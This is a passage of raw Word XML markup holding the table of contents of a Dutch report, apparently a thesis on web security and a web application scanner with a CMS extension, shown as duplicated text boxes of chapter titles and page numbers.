                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3100070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="7672705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="917" name="Text Box 917"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="7672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0D9C6" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.5 API</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>75</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="08EF3D2D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.6 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>76</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D0A9C52" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00353D0C" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Eindconclusie</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>82</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B1BDFBC" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>Bronnenlijst</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>83</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7763295A" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>Bijlage</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>84</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="32365DDA" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                          <w:p w14:paraId="6ABB4D48" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3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C395B" id="Text Box 917" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:244.1pt;margin-top:15.4pt;width:230pt;height:604.15pt;z-index:2533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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2E40D9C6" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.5 API</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>75</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="08EF3D2D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.6 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>76</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D0A9C52" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00353D0C" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Eindconclusie</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>82</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B1BDFBC" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>Bronnenlijst</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>83</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7763295A" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>Bijlage</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>84</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="32365DDA" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                    <w:p w14:paraId="6ABB4D48" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253329408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0278540A" wp14:editId="4A870D42">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-11430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="7660640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="916" name="Text Box 916"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="7660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ED4E75" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve">1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006B0926">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Inleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="57E790BE" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Aanleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="69A8ADFD" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Probleemstelling</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0727A6B8" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.3 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Scope</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>9</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17339239" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.4 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Onderzoek opzet</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>10</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="307D6315" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.5 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Project context</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>11</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="554EF651" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r w:rsidRPr="006B0926">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>2 Business Context</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>13</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="514C6B86" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">2.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Stakeholders en Business doelen</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>13</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BC5D54F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">2.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Doelgroep</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>17</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F952B89" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r w:rsidRPr="00D96DB8">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>3 Onderzoek</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>23</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="48B42014" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">3.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Inleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>23</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="413F7C1A" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">3.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Web Security en de kwetsbaarheden</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>24</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B88CD4F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>3.3 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>32</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A391DB4" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>3.4 Technologie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>39</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C35393D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="000826D9" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>4 Concept</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>44</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30E1B180" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.1 Concept van het systeem</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>45</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D635B42" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.2 Pandora CMS Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>47</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47B0D20F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.3 Admin Paneel</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>49</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6577768B" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.4 API</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>50</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="330B9E52" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.5 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>51</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FC571E0" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="000826D9" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>5 Eindproduct</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>66</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34AE8028" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.1 Pandora CMS Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>67</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="257759F2" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.2 Admin Paneel</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>69</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EC26377" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.3 Rapport</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>71</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="326EC22B" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.4 Email Service</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>73</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E1BC1DD" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                          <w:p w14:paraId="69E917BF" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3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8540A" id="Text Box 916" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.9pt;margin-top:15.45pt;width:230pt;height:603.2pt;z-index:2533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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11ED4E75" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve">1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006B0926">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Inleiding</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="57E790BE" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Aanleiding</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="69A8ADFD" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Probleemstelling</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0727A6B8" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.3 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Scope</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>9</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17339239" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.4 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Onderzoek opzet</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>10</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="307D6315" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.5 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Project context</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>11</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="554EF651" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r w:rsidRPr="006B0926">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>2 Business Context</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>13</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="514C6B86" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
